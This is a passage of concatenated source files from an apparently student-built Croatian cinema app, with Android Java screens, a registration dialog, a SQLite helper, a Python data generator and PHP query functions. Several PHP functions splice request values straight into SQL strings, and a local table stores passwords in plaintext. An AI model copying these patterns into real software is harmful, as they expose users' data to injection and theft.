AkutalnoActivity).\r\n\t * @return podaci o filmu\r\n\t */\r\n\tprivate FilmInfo 
dohvatiPodatkeZaFilm() {\r\n\t\tIntent i = getIntent();\r\n\t\tint idFilmaUBazi = i.getIntExtra(\"idFilmaUBazi\", 0);\r\n\t\t\r\n\t\tFilmoviAdapter fa = new FilmoviAdapter(this);\r\n\t\treturn fa.dohvatiDetaljeFilma(idFilmaUBazi);\r\n\t}\r\n\t\r\n\t/**\r\n\t * Ispisuje na zaslonu informacije sve dohvaćene o filmu, uključujući i sliku filma.\r\n\t * @param detaljiFilma predstavlja informacije o filmu koje treba ispisati na zaslon\r\n\t */\r\n\tprivate void prikaziPodatkeZaFilm(FilmInfo detaljiFilma) {\r\n\t\tTextView naslov = (TextView) findViewById(R.id.naslov_filma);\r\n\t\tTextView trajanje = (TextView) findViewById(R.id.detalji_filma_trajanje);\r\n\t\tTextView zanr = (TextView) findViewById(R.id.detalji_filma_zanr);\r\n\t\tTextView redatelj = (TextView) findViewById(R.id.detalji_filma_redatelj);\r\n\t\tTextView glavneUloge = (TextView) findViewById(R.id.detalji_filma_glumci);\r\n\t\tTextView opis = (TextView) findViewById(R.id.detalji_filma_detalji);\r\n\t\tImageView slika = (ImageView) findViewById(R.id.slikaFilma);\r\n\t\t\r\n\t\tnaslov.setText(detaljiFilma.getNaziv());\r\n\t\ttrajanje.setText(detaljiFilma.getTrajanje() + \" minuta\");\r\n\t\tzanr.setText(detaljiFilma.getZanr());\r\n\t\tredatelj.setText(detaljiFilma.getRedatelj());\r\n\t\tglavneUloge.setText(detaljiFilma.getGlavneUloge());\r\n\t\topis.setText(detaljiFilma.getOpis());\r\n\t\tISlikaFilma sf = UcitajSlikuFactory.ucitaj(getBaseContext(), detaljiFilma.getIdFilma(), true);\r\n\t\tslika.setImageBitmap(sf.dohvatiVelikuSliku());\r\n\t}\r\n}\r\n" }, { "alpha_fraction": 0.6786172986030579, "alphanum_fraction": 0.6856849193572998, "avg_line_length": 38.74345397949219, "blob_id": "4aa351ad559492b8e121ee055931ecaf0f57cf95", "content_id": "9ab4b526a6cb92e5d082842339272bb35df809c7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 7814, "license_type": "no_license", "max_line_length": 106, "num_lines": 191, "path": "/client-side/src/hr/air/mkino/core/Registracija.java", "repo_name": "dsitum/mKino", "src_encoding": "WINDOWS-1250", "text": "package hr.air.mkino.core;\r\n\r\nimport hr.air.mkino.R;\r\nimport hr.air.mkino.server.JsonRegistracija;\r\nimport hr.air.mkino.tipovi.Korisnik;\r\nimport android.app.Dialog;\r\nimport android.content.Context;\r\nimport android.view.View;\r\nimport android.view.Window;\r\nimport android.view.View.OnClickListener;\r\nimport android.widget.Button;\r\nimport android.widget.EditText;\r\nimport android.widget.Toast;\r\n/**\r\n * Klasa koja sadrži metode za prikazivanje obrasca za registraciju\r\n * */\r\npublic class Registracija {\r\n\t/*konstante za označavanje identifikacijskog broja pogreške prilikom registracije*/\r\n\tfinal static public int USPJESNA_REGISTRACIJA = 0; /*uspješna registracija */\r\n\tfinal static public int PONOVLJENA_LOZINKA = 1; /*ponovljena lozinka nije jednaka*/\r\n\tfinal static public int KORISNIK_POSTOJI = 4; /*korisnik već postoji */\r\n\tfinal static public int EMAIL_POSTOJI = 5; /*email već postoji*/\r\n\tfinal static public int TELEFON_POSTOJI = 6;\t\t /*telefonski broj već postoji */\r\n\tfinal static public int NEUSPJESNO_REG = 7; /*neuspješno dodavanje kojemu je razlog nepoznat*/\r\n\tfinal static public int KORIME_PRAZNO = 8; /*korisničko ime je prazno */\r\n\tfinal static public int IME_PRAZNO = 9; /*ime je prazno*/\r\n\tfinal static public int PREZIME_PRAZNO = 10; /*prezime je prazno*/\r\n\tfinal static public int LOZINKA_PRAZNA = 11; /*lozinka je prazna*/\r\n\tfinal static public int EMAIL_PRAZAN = 12; /*email 
je prazan*/\r\n\tfinal static public int TELEFON_PRAZAN = 13; /*telefon je prazan*/\r\n\t\r\n\t \r\n\t/** \r\n\t * Metoda koja prikazuje obrazac za registraciju\r\n\t * @param trenutni Context\r\n\t * */\r\n\tpublic void prikaziDijalog(final Context context) {\r\n\t\t/*otvori dijalog za registraciju*/\r\n\t\tfinal Dialog dialogRegistracija = new Dialog(context);\r\n\t\tdialogRegistracija.requestWindowFeature(Window.FEATURE_NO_TITLE);\r\n\t\tdialogRegistracija.setContentView(R.layout.dialog_registracija);\r\n\t\tdialogRegistracija.show();\r\n\r\n\t\t/*dohvaćanje unešenih podataka*/\r\n\t\tButton btnRegistrirajSe = (Button) dialogRegistracija\r\n\t\t\t\t.findViewById(R.id.registracija_btnRegistrirajSe);\r\n\t\tButton btnOdustani = (Button) dialogRegistracija\r\n\t\t\t\t.findViewById(R.id.registracija_btnOdustani);\r\n\r\n\t\tfinal EditText txtKorisnickoIme = (EditText) dialogRegistracija\r\n\t\t\t\t.findViewById(R.id.dialog_registracija_txtKorisnickoIme);\r\n\t\tfinal EditText txtLozinka = (EditText) dialogRegistracija\r\n\t\t\t\t.findViewById(R.id.dialog_registracija_txtLozinka);\r\n\t\tfinal EditText txtPonovljenaLozinka = (EditText) dialogRegistracija\r\n\t\t\t\t.findViewById(R.id.dialog_registracija_txtPonovljenaLozinka);\r\n\t\tfinal EditText txtIme = (EditText) dialogRegistracija\r\n\t\t\t\t.findViewById(R.id.dialog_registracija_txtIme);\r\n\t\tfinal EditText txtPrezime = (EditText) dialogRegistracija\r\n\t\t\t\t.findViewById(R.id.dialog_registracija_txtPrezime);\r\n\t\tfinal EditText txtEmail = (EditText) dialogRegistracija\r\n\t\t\t\t.findViewById(R.id.dialog_registracija_txtEmail);\r\n\t\tfinal EditText txtTelefon = (EditText) dialogRegistracija\r\n\t\t\t\t.findViewById(R.id.dialog_registracija_txtTelefon);\r\n\r\n\t\t/*izlazak iz dijaloga*/\r\n\t\tbtnOdustani.setOnClickListener(new OnClickListener() {\r\n\r\n\t\t\t@Override\r\n\t\t\tpublic void onClick(View v) {\r\n\t\t\t\tdialogRegistracija.dismiss();\r\n\t\t\t}\r\n\t\t});\r\n\t\t\r\n\t\t/*registracija*/\r\n\t\tbtnRegistrirajSe.setOnClickListener(new OnClickListener() {\r\n\r\n\t\t\t@Override\r\n\t\t\tpublic void onClick(View v) {\r\n\t\t\t\t/*parsiranje korisničkog unosa u formu*/\r\n\t\t\t\tString korisnickoIme = txtKorisnickoIme.getText().toString();\r\n\t\t\t\tString lozinka = txtLozinka.getText().toString();\r\n\t\t\t\tString ponovljenaLozinka = txtPonovljenaLozinka.getText().toString();\r\n\t\t\t\tString ime = txtIme.getText().toString();\r\n\t\t\t\tString prezime = txtPrezime.getText().toString();\r\n\t\t\t\tString email = txtEmail.getText().toString();\r\n\t\t\t\tString telefon = txtTelefon.getText().toString();\t\t\t\r\n\t\t\t\t\r\n\t\t\t\tKorisnik korisnik = new Korisnik(korisnickoIme, lozinka, ime, prezime, email, telefon);\t\r\n\t\t\t\t\r\n\t\t\t\t/*izvršavanje registracije i obavještavanje korisnika o uspješnosti*/\r\n\t\t\t\tswitch(IzvrsiRegistraciju(korisnik, ponovljenaLozinka))\r\n\t\t\t\t{\r\n\t\t\t\t\tcase USPJESNA_REGISTRACIJA: \r\n\t\t\t\t\t\tToast.makeText(context, \"Uspješna registracija!\", Toast.LENGTH_SHORT).show();\r\n\t\t\t\t\t\tdialogRegistracija.dismiss();\r\n\t\t\t\t\t\tbreak;\r\n\t\t\t\t\tcase PONOVLJENA_LOZINKA: \r\n\t\t\t\t\t\tToast.makeText(context, \"Lozinke nisu jednake!\", Toast.LENGTH_SHORT).show();\r\n\t\t\t\t\t\tbreak;\t\t\t\t\r\n\t\t\t\t\tcase KORISNIK_POSTOJI: \r\n\t\t\t\t\t\tToast.makeText(context, \"Korisničko ime zauzeto!\", Toast.LENGTH_SHORT).show();\r\n\t\t\t\t\t\tbreak;\r\n\t\t\t\t\tcase EMAIL_POSTOJI: \r\n\t\t\t\t\t\tToast.makeText(context, \"e-mail zauzet!\", 
Toast.LENGTH_SHORT).show();\r\n\t\t\t\t\t\tbreak;\r\n\t\t\t\t\tcase TELEFON_POSTOJI:\r\n\t\t\t\t\t\tToast.makeText(context, \"telefon zauzet!\", Toast.LENGTH_SHORT).show();\r\n\t\t\t\t\t\tbreak;\r\n\t\t\t\t\tcase NEUSPJESNO_REG: \r\n\t\t\t\t\t\tToast.makeText(context, \"Registracija nije uspjela! Pokušajte ponovno.\", Toast.LENGTH_SHORT).show();\r\n\t\t\t\t\t\tbreak;\r\n\t\t\t\t\tcase KORIME_PRAZNO: \r\n\t\t\t\t\t\tToast.makeText(context, \"Molimo Vas, unesite korisničko ime!\", Toast.LENGTH_SHORT).show();\r\n\t\t\t\t\t\tbreak;\r\n\t\t\t\t\tcase IME_PRAZNO: \r\n\t\t\t\t\t\tToast.makeText(context, \"Molimo Vas, unesite ime!\", Toast.LENGTH_SHORT).show();\r\n\t\t\t\t\t\tbreak;\r\n\t\t\t\t\tcase PREZIME_PRAZNO: \r\n\t\t\t\t\t\tToast.makeText(context, \"Molimo Vas, unesite prezime!\", Toast.LENGTH_SHORT).show();\r\n\t\t\t\t\t\tbreak;\r\n\t\t\t\t\tcase LOZINKA_PRAZNA: \r\n\t\t\t\t\t\tToast.makeText(context, \"Molimo Vas, unesite lozinku!\", Toast.LENGTH_SHORT).show();\r\n\t\t\t\t\t\tbreak;\r\n\t\t\t\t\tcase EMAIL_PRAZAN: \r\n\t\t\t\t\t\tToast.makeText(context, \"Molimo Vas, unesite email!\", Toast.LENGTH_SHORT).show();\r\n\t\t\t\t\t\tbreak;\r\n\t\t\t\t\tcase TELEFON_PRAZAN: \r\n\t\t\t\t\t\tToast.makeText(context, \"Molimo Vas, unesite telefon!\", Toast.LENGTH_SHORT).show();\r\n\t\t\t\t\t\tbreak;\r\n\t\t\t\t\tdefault: \r\n\t\t\t\t\t\tToast.makeText(context, \"Registracija nije uspjela! Pokušajte ponovno.\", Toast.LENGTH_SHORT).show();\r\n\t\t\t\t\t\tbreak;\r\n\t\t\t\t\r\n\t\t\t\t}\r\n\t\t\t\t\t\t\t\t\r\n\t\t\t}\r\n\t\t});\r\n\r\n\t}\r\n\r\n\t/**\r\n\t * Metoda koja izvršava registraciju korisnika putem POST metode. \r\n\t * Prvo se podaci validiraju na korisničkoj strani, a\r\n\t * ukoliko dođe do pogreške vraća se broj pogreške ovisno o odgovoru kojeg\r\n\t * vraća servis prilikom validacije i unosa u bazu\r\n\t * \r\n\t * @param objekt tipka Korisnik sa popunjenim podacima i ponovljena lozinka za validaciju\r\n\t * @return \r\n\t *\t USPJESNA_REGISTRACIJA = 0; \r\n\t *\t PONOVLJENA_LOZINKA = 1;\r\n\t *\t KORISNIK_POSTOJI = 4;\r\n\t *\t EMAIL_POSTOJI = 5;\r\n\t *\t TELEFON_POSTOJI = 6;\r\n\t *\t NEUSPJESNO_REG = 7;\r\n\t *\t KORIME_PRAZNO = 8;\r\n\t *\t IME_PRAZNO = 9;\r\n\t *\t PREZIME_PRAZNO = 10;\r\n\t *\t LOZINKA_PRAZNA = 11;\r\n\t *\t EMAIL_PRAZAN = 12;\r\n\t * \t TELEFON_PRAZAN = 13;\r\n\t */\r\n\tpublic int IzvrsiRegistraciju(Korisnik korisnik, String ponovljenaLozinka) {\r\n\t\t\r\n\t\t/*validacija korisničkog unosa*/\r\n\t\tif (korisnik.getKorisnickoIme().length() == 0 || korisnik.getKorisnickoIme() == null) \r\n\t\t\treturn 8;\r\n\t\tif (ponovljenaLozinka.length() == 0 || ponovljenaLozinka == null)\r\n\t\t\treturn 11;\r\n\t\tif(korisnik.getLozinka().length() == 0 || korisnik.getLozinka() == null)\r\n\t\t\treturn 11;\r\n\t\tif (korisnik.getIme().length() == 0 || korisnik.getIme() == null)\r\n\t\t\treturn 9;\r\n\t\tif (korisnik.getPrezime().length() == 0 || korisnik.getPrezime() == null)\r\n\t\t\treturn 10;\r\n\t\tif (korisnik.getLozinka().length() == 0 || korisnik.getLozinka() == null)\r\n\t\t\treturn 11;\t\t\r\n\t\tif (korisnik.getEmail().length() == 0 || korisnik.getEmail() == null)\r\n\t\t\treturn 12;\r\n\t\tif(korisnik.getTelefon().length() == 0 || korisnik.getTelefon() == null)\r\n\t\t\treturn 13;\t\t\r\n\t\tif(!ponovljenaLozinka.equals(korisnik.getLozinka()))\r\n\t\t\treturn 1;\r\n\t\t\r\n\t\tJsonRegistracija jsonReg = new JsonRegistracija();\r\n\t\t/*provjera na korisničkoj strani je uspješno izvršena, izvršavamo registraciju putem post metode*/\r\n\t\tint uspjesnaRegistracija = 
jsonReg.registriraj(korisnik);\r\n\t\t\r\n\t\treturn uspjesnaRegistracija;\r\n\t}\r\n\r\n}\r\n" }, { "alpha_fraction": 0.6276476979255676, "alphanum_fraction": 0.6867335438728333, "avg_line_length": 43.849998474121094, "blob_id": "2243907dc549402c914bd57345bf023a9456a51b", "content_id": "ff7c6c03ae9ebb5ab254390a288bb1a6b7fe349d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 898, "license_type": "no_license", "max_line_length": 210, "num_lines": 20, "path": "/server-side/Baza/generiranjeProjekcija.py", "repo_name": "dsitum/mKino", "src_encoding": "UTF-8", "text": "#!/usr/bin/python3.3\n\nimport random\n\ns = \"Insert into projekcijefilmova (dvorana, film, vrijemePocetka, cijena) values \"\n\nfor k in range(9, 24, 2): # 8 puta. vrijeme\n\tfor i in range(2, 22): # svi filmovi\n\t\tsvakiFilmUXDvorana = random.randint(10, 15) #uključive obje granice\n\t\tiskoristeneDvoraneUTerminu = set()\n\t\tfor j in range(svakiFilmUXDvorana):\n\t\t\t# biramo dvoranu\n\t\t\tdvorana = random.randint(1, 80)\n\t\t\twhile ((dvorana > 26 and dvorana < 35) or (dvorana > 49 and dvorana < 58) or (dvorana > 65 and dvorana < 76) or (dvorana in iskoristeneDvoraneUTerminu)):\n\t\t\t\tdvorana = random.randint(1, 80)\n\t\t\tiskoristeneDvoraneUTerminu.add(dvorana)\n\t\t\ts += \"({dv}, {film}, '2014-01-{dan} {sat}:{minuta}:00', {cijena}), \".format(dv=dvorana, film=i, dan=random.randint(1, 10), sat=k, minuta=str(random.randint(0,1)*30).zfill(2), cijena=25+random.randint(0,2)*5)\n\nwith open('sve.sql', 'w') as f:\n\tf.write(s)\n" }, { "alpha_fraction": 0.7694393992424011, "alphanum_fraction": 0.7703436017036438, "avg_line_length": 49.46511459350586, "blob_id": "72fd464774ef57f51799a701ea1cf3b65668dd6d", "content_id": "fd28d49a813c986893bb73aed433217f7f792636", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 2219, "license_type": "no_license", "max_line_length": 225, "num_lines": 43, "path": "/client-side/src/hr/air/mkino/baza/DbHelper.java", "repo_name": "dsitum/mKino", "src_encoding": "WINDOWS-1250", "text": "package hr.air.mkino.baza;\r\n\r\nimport java.util.ArrayList;\r\nimport java.util.List;\r\n\r\nimport android.content.Context;\r\nimport android.database.sqlite.SQLiteDatabase;\r\nimport android.database.sqlite.SQLiteDatabase.CursorFactory;\r\nimport android.database.sqlite.SQLiteOpenHelper;\r\n\r\n/**\r\n * Ova klasa služi za ostvarivanje pristupa lokalnoj bazi podataka. 
Kada se instancira ovaj objekt, stvaraju se sve potrebne tablice kako bi bile spremne za postupak čitanja/pisanja\r\n * @author domagoj\r\n *\r\n */\r\npublic class DbHelper extends SQLiteOpenHelper {\r\n\r\n\tpublic DbHelper(Context context, String name, CursorFactory factory,\r\n\t\t\tint version) {\r\n\t\tsuper(context, name, factory, version);\r\n\t}\r\n\t\r\n\t// prilikom stvaranja instance se stvaraju i sve potrebne tablice\r\n\t@Override\r\n\tpublic void onCreate(SQLiteDatabase db) {\r\n\t\tList<String> tablice = new ArrayList<String>();\r\n\t\ttablice.add(\"CREATE TABLE IF NOT EXISTS multipleksi (idMultipleksa INTEGER PRIMARY KEY, naziv TEXT, oznaka TEXT, zemljopisnaDuzina REAL, zemljopisnaSirina REAL)\");\r\n\t\ttablice.add(\"CREATE TABLE IF NOT EXISTS korisnik (idKorisnika INTEGER PRIMARY KEY, korisnickoIme TEXT, ime TEXT, prezime TEXT, email TEXT, telefon TEXT)\");\r\n\t\ttablice.add(\"CREATE TABLE IF NOT EXISTS filmovi (idFilma INTEGER PRIMARY KEY, naziv TEXT, opis TEXT, redatelj TEXT, glavneUloge TEXT, trajanje INTEGER, godina INTEGER, aktualno INTEGER, zanr TEXT)\");\r\n\t\ttablice.add(\"CREATE TABLE IF NOT EXISTS projekcije(idProjekcije INTEGER PRIMARY KEY, dvorana INTEGER, film INTEGER CONSTRAINT fk55 REFERENCES filmovi(idFilma), vrijemePocetka DATETIME, cijena INTEGER, multipleks INTEGER)\");\r\n\t\ttablice.add(\"CREATE TABLE IF NOT EXISTS odabranimultipleks (id INTEGER)\");\r\n\t\ttablice.add(\"CREATE TABLE IF NOT EXISTS mojaRezervacija (idRezervacije INTEGER, idProjekcije INTEGER, korisnickoIme TEXT, kodRezervacije TEXT, sjedalo INTEGER)\");\r\n\t\ttablice.add(\"CREATE TABLE IF NOT EXISTS prijavljenikorisnik (korisnickoIme TEXT, lozinka TEXT)\");\r\n\t\t\r\n\t\tfor (String tablica : tablice)\r\n\t\t\tdb.execSQL(tablica);\r\n\t}\r\n\r\n\t@Override\r\n\tpublic void onUpgrade(SQLiteDatabase db, int oldVersion, int newVersion) {\r\n\t\t// ovo mora biti ovdje, unatoč tome što zasad ne treba i što možda neće trebati\r\n\t}\r\n}\n" }, { "alpha_fraction": 0.712106466293335, "alphanum_fraction": 0.712431013584137, "avg_line_length": 26.794391632080078, "blob_id": "da9f83eeaf6ab4d2cdf2ed7d7dfaf22aec95fca9", "content_id": "8d7118eb8ff036bbfeba0c9b8757c876f411fa9a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 3087, "license_type": "no_license", "max_line_length": 119, "num_lines": 107, "path": "/client-side/src/hr/air/mkino/server/JsonMultipleksi.java", "repo_name": "dsitum/mKino", "src_encoding": "WINDOWS-1250", "text": "package hr.air.mkino.server;\r\n\r\nimport hr.air.mkino.tipovi.MultipleksInfo;\r\n\r\nimport java.io.IOException;\r\nimport java.util.ArrayList;\r\nimport java.util.List;\r\nimport java.util.concurrent.ExecutionException;\r\n\r\nimport org.apache.http.client.ClientProtocolException;\r\nimport org.apache.http.client.HttpClient;\r\nimport org.apache.http.client.ResponseHandler;\r\nimport org.apache.http.client.methods.HttpGet;\r\nimport org.apache.http.impl.client.BasicResponseHandler;\r\nimport org.apache.http.impl.client.DefaultHttpClient;\r\nimport org.json.JSONArray;\r\nimport org.json.JSONException;\r\nimport org.json.JSONObject;\r\n\r\nimport android.os.AsyncTask;\r\n\r\n/**\r\n * Ova klasa služi za dohvat svih multipleksa sa web servisa.\r\n * @author domagoj\r\n *\r\n */\r\npublic class JsonMultipleksi extends AsyncTask<Void, Void, String> {\r\n\t/**\r\n\t * Dohvaća multiplekse sa web servisa\r\n\t * @return lista multipleksa\r\n\t */\r\n\tpublic List<MultipleksInfo> 
dohvatiMultiplekse()\r\n\t{\r\n\t\t// dohvatiti podatke s web servsa\t\t\r\n\t\tthis.execute();\r\n\t\tString jsonRezultat = \"\";\r\n\t\ttry {\r\n\t\t\tjsonRezultat = this.get();\r\n\t\t} catch (InterruptedException e) {\r\n\t\t\te.printStackTrace();\r\n\t\t} catch (ExecutionException e) {\r\n\t\t\te.printStackTrace();\r\n\t\t}\r\n\t\t\r\n\t\tList<MultipleksInfo> multipleksi = parsirajJson(jsonRezultat);\r\n\t\treturn multipleksi;\r\n\t}\r\n\r\n\t/**\r\n\t * Parsira JSON string dohvaćen s web servisa\r\n\t * @param jsonRezultat\r\n\t * @return multipleksi\r\n\t */\r\n\tprivate List<MultipleksInfo> parsirajJson(String jsonRezultat) {\r\n\t\tList<MultipleksInfo> multipleksi = new ArrayList<MultipleksInfo>();\r\n\t\tint idMultipleksa;\r\n\t\tString naziv;\r\n\t\tString oznaka;\r\n\t\tfloat zemljopisnaDuzina;\r\n\t\tfloat zemljopisnaSirina;\r\n\t\t\r\n\t\ttry {\r\n\t\t\tJSONArray mpleksi = new JSONArray(jsonRezultat);\r\n\t\t\tint n = mpleksi.length();\r\n\t\t\tfor(int i=0; i<n; i++)\r\n\t\t\t{\r\n\t\t\t\tJSONObject mpleks = mpleksi.getJSONObject(i);\r\n\t\t\t\tidMultipleksa = mpleks.getInt(\"idMultipleksa\");\r\n\t\t\t\tnaziv = mpleks.getString(\"naziv\");\r\n\t\t\t\toznaka = mpleks.getString(\"oznaka\");\r\n\t\t\t\tzemljopisnaDuzina = Float.valueOf(mpleks.getString(\"zemljopisnaDuzina\"));\r\n\t\t\t\tzemljopisnaSirina = Float.valueOf(mpleks.getString(\"zemljopisnaSirina\"));\r\n\t\t\t\tMultipleksInfo multipleks = new MultipleksInfo(idMultipleksa, naziv, oznaka, zemljopisnaDuzina, zemljopisnaSirina);\r\n\t\t\t\t\r\n\t\t\t\tmultipleksi.add(multipleks);\r\n\t\t\t}\r\n\t\t} \r\n\t\tcatch (JSONException e) {\r\n\t\t\te.printStackTrace();\r\n\t\t}\r\n\t\t\r\n\t\treturn multipleksi;\r\n\t}\r\n\r\n\t// pomoćna metoda koja u pozadini obrađuje http zahtjev (dohvaćanje podataka)\r\n\t@Override\r\n\tprotected String doInBackground(Void... params) {\r\n\t\tHttpClient httpKlijent = new DefaultHttpClient();\r\n\t\tHttpGet httpZahtjev = new HttpGet(\"http://mkinoairprojekt.me.pn/skripte/index.php?tip=multipleksi\");\r\n\t\t\r\n\t\tString jsonResult = \"\";\r\n\t\tResponseHandler<String> handler = new BasicResponseHandler();\r\n\t\t\r\n\t\ttry {\r\n\t\t\tjsonResult = httpKlijent.execute(httpZahtjev, handler);\r\n\t\t}\r\n\t\tcatch(ClientProtocolException e){\r\n\t\t\te.printStackTrace();\r\n\t\t}\r\n\t\tcatch(IOException e){\r\n\t\t\te.printStackTrace();\r\n\t\t}\r\n\t\t\r\n\t\thttpKlijent.getConnectionManager().shutdown();\r\n\t\treturn jsonResult;\r\n\t}\r\n}\r\n" }, { "alpha_fraction": 0.4762108027935028, "alphanum_fraction": 0.4795178174972534, "avg_line_length": 47.87234115600586, "blob_id": "7e18d80d748f9dc9e8ec70e4d57c3863c2d18a73", "content_id": "0f53e17d92a3648d6228ffc0da453ab9ba00ff8f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 9375, "license_type": "no_license", "max_line_length": 370, "num_lines": 188, "path": "/server-side/Datoteke/skripte/filmovi.php", "repo_name": "dsitum/mKino", "src_encoding": "UTF-8", "text": "<?php\r\n class Filmovi\r\n {\r\n public static function DohvatiFilmove($aktualno)\r\n {\r\n require_once 'DB_connect.php';\r\n $upit = \"SELECT idFilma, filmovi.naziv as naziv, opis, redatelj, glavneUloge, trajanje, godina, zanrovi.naziv as zanr, aktualno FROM filmovi JOIN zanrovi ON (filmovi.zanr = zanrovi.idZanra) WHERE aktualno = \" . 
$aktualno;\r\n \r\n $filmovi = UpitUBazu($upit);\r\n return $filmovi;\r\n }\r\n public static function DohvatiRezervacije($korisnik)\r\n {\r\n require_once 'DB_connect.php';\r\n $upit = \"SELECT idKorisnika FROM korisnici WHERE korisnickoIme = '$korisnik'\";\r\n $idKorisnika = UpitUBazu($upit);\r\n $upit = \"SELECT * FROM rezervacije LEFT JOIN projekcijefilmova ON rezervacije.projekcija = projekcijefilmova.idProjekcije WHERE projekcijefilmova.vrijemePocetka >= NOW() AND korisnik = \" . $idKorisnika[0]['idKorisnika'] . \" ORDER BY rezervacije.projekcija\";\r\n $projekcije = UpitUBazu($upit);\r\n return $projekcije;\r\n }\r\n \r\n public static function DohvatiNekeFilmove($aktualno, $bezOvih)\r\n {\r\n require_once 'DB_connect.php';\r\n $upit = \"SELECT idFilma, filmovi.naziv as naziv, opis, redatelj, glavneUloge, trajanje, godina, zanrovi.naziv as zanr, aktualno FROM filmovi JOIN zanrovi ON (filmovi.zanr = zanrovi.idZanra)\";\r\n \r\n $filmovi = UpitUBazu($upit);\r\n \r\n $bezOvihFilmovaTmp = json_decode($bezOvih);\r\n $bezOvihFilmova = array();\r\n foreach($bezOvihFilmovaTmp as $bezOvog)\r\n $bezOvihFilmova[] = $bezOvog->{'idFilma'};\r\n \r\n $samoOviFilmovi = array();\r\n \r\n foreach($filmovi as $film)\r\n {\r\n $idFilma = $film[\"idFilma\"];\r\n if (! in_array($idFilma, $bezOvihFilmova) && $film[\"aktualno\"] == 1)\r\n {\r\n $samoOviFilmovi[] = $film;\r\n }\r\n \r\n if (in_array($idFilma, $bezOvihFilmova) && $film[\"aktualno\"] == 0)\r\n {\r\n $samoOviFilmovi[] = $film;\r\n }\r\n }\r\n \r\n return $samoOviFilmovi;\r\n }\r\n \r\n public static function DohvatiSveProjekcije($film, $multipleks)\r\n {\r\n require_once 'DB_connect.php';\r\n $upit = \"SELECT idProjekcije, vrijemePocetka, cijena, brojDvorane FROM projekcijefilmova JOIN dvorane ON (projekcijefilmova.dvorana = dvorane.idDvorane) JOIN multipleksi ON (dvorane.multipleks = multipleksi.idMultipleksa) WHERE projekcijefilmova.film = $film AND dvorane.multipleks = $multipleks AND DATE(vrijemePocetka) >= DATE(DATE_ADD(NOW(), INTERVAL 1 HOUR))\";\r\n $projekcije = UpitUBazu($upit);\r\n return $projekcije;\r\n }\r\n \r\n public static function DohvatiProjekcijeNaDan($film, $multipleks, $datum)\r\n {\r\n require_once 'DB_connect.php';\r\n $upit = \"SELECT idProjekcije, vrijemePocetka, cijena, brojDvorane FROM projekcijefilmova JOIN dvorane ON (projekcijefilmova.dvorana = dvorane.idDvorane) JOIN multipleksi ON (dvorane.multipleks = multipleksi.idMultipleksa) WHERE projekcijefilmova.film = $film AND dvorane.multipleks = $multipleks AND DATE(vrijemePocetka) = '$datum'\";\r\n $projekcije = UpitUBazu($upit);\r\n return $projekcije;\r\n }\r\n public static function DohvatiProjekcijeMultipleks($multipleks, $bezOvih)\r\n {\r\n require_once 'DB_connect.php';\r\n $danasnjiDatum = date('Y-m-d H:i:s', time());\r\n $danasnjiDatum = date('Y-m-d', strtotime($danasnjiDatum . '+ 30 minute'));\r\n $iduca2Tjedna = date('Y-m-d', strtotime($danasnjiDatum . 
'+ 14 day'));\r\n $upit = \"SELECT p.idProjekcije, p.film, p.vrijemePocetka, p.cijena, d.brojDvorane, d.multipleks FROM projekcijefilmova AS p LEFT JOIN dvorane AS d ON p.dvorana = d.idDvorane WHERE d.multipleks = $multipleks AND p.vrijemePocetka >= DATE_ADD(NOW(), INTERVAL 1 HOUR) ORDER BY p.film ASC , `p`.`vrijemePocetka` ASC\";\r\n $projekcije = UpitUBazu($upit);\r\n \r\n try{\r\n $bezOvihProjekcijaTmp = json_decode($bezOvih);\r\n $bezOvihProjekcija = array();\r\n if(!empty($bezOvihProjekcijaTmp))\r\n {\r\n foreach($bezOvihProjekcijaTmp as $bezOvog)\r\n $bezOvihProjekcija[] = $bezOvog->{'idProjekcije'};\r\n }\r\n }\r\n catch( Exception $e){\r\n \r\n }\r\n $samoOveProjekcije = array();\r\n \r\n foreach($projekcije as $projekcija)\r\n {\r\n \r\n if(($projekcija['vrijemePocetka'] >= $danasnjiDatum) && ($projekcija['vrijemePocetka'] <= $iduca2Tjedna))\r\n {\r\n $uvjet = true;\r\n }\r\n else \r\n {\r\n $uvjet=false;\r\n }\r\n \r\n \r\n \r\n $idProjekcije = $projekcija[\"idProjekcije\"];\r\n if (! in_array($idProjekcije, $bezOvihProjekcija) && ($uvjet == true))\r\n {\r\n \r\n $samoOveProjekcije[] = $projekcija;\r\n }\r\n if ( in_array($idProjekcije, $bezOvihProjekcija)&& ($uvjet == false))\r\n {\r\n $samoOveProjekcije[] = $projekcija;\r\n }\r\n } \r\n return $samoOveProjekcije; \r\n }\r\n public static function DohvatiSjedalaProjekcija($projekcija)\r\n {\r\n require_once 'DB_connect.php';\r\n $upit = \"SELECT brojSjedala FROM rezervacije WHERE projekcija =\".$projekcija.\" order by brojSjedala\";\r\n \r\n $projekcije = UpitUBazu($upit);\r\n return $projekcije;\r\n }\r\n public static function Rezerviraj($projekcija, $korisnik, $sjedalaJSON)\r\n {\r\n \r\n $zapis = array();\r\n require_once 'DB_connect.php';\r\n $upit = \"SELECT idKorisnika FROM korisnici WHERE korisnickoIme = '\".$korisnik.\"'\";\r\n \r\n $idKorisnika = UpitUBazu($upit); \r\n \r\n $sjedalaTmp = json_decode($sjedalaJSON); \r\n $sjedala = array();\r\n \r\n $kodRezervacije = $idKorisnika[0]['idKorisnika'] .\"-\".$projekcija;\r\n \r\n $zauzetoMjesto = 0;\r\n for($i = 0; $i < count(sjedalaTmp); $i++)\r\n {\r\n $upit = \"SELECT * FROM rezervacije WHERE projekcija =\".$projekcija.\" AND brojSjedala=\".(string)$sjedalaTmp[$i]->{'sjedalo'}.\"\";\r\n $rezervacije = UpitUBazu($upit);\r\n if($rezervacije[0][povratnaInformacijaId] !== 1) $zauzetoMjesto=1; \r\n \r\n } \r\n \r\n if($zauzetoMjesto === 0)\r\n {\r\n for($i = 0; $i < sizeof($sjedalaTmp,1); $i++)\r\n {\r\n $upit = \"INSERT INTO rezervacije VALUES (DEFAULT,\".$projekcija.\", \".(string)$idKorisnika[0]['idKorisnika'].\", \".(string)$sjedalaTmp[$i]->{'sjedalo'}.\", '\".$kodRezervacije.\"')\";\r\n $uspjesnost = Transakcija($upit);\r\n \r\n }\r\n if($uspjesnost === -6)\r\n {\r\n $zapis[0] = array(\"povratnaInformacijaId\" => -6, 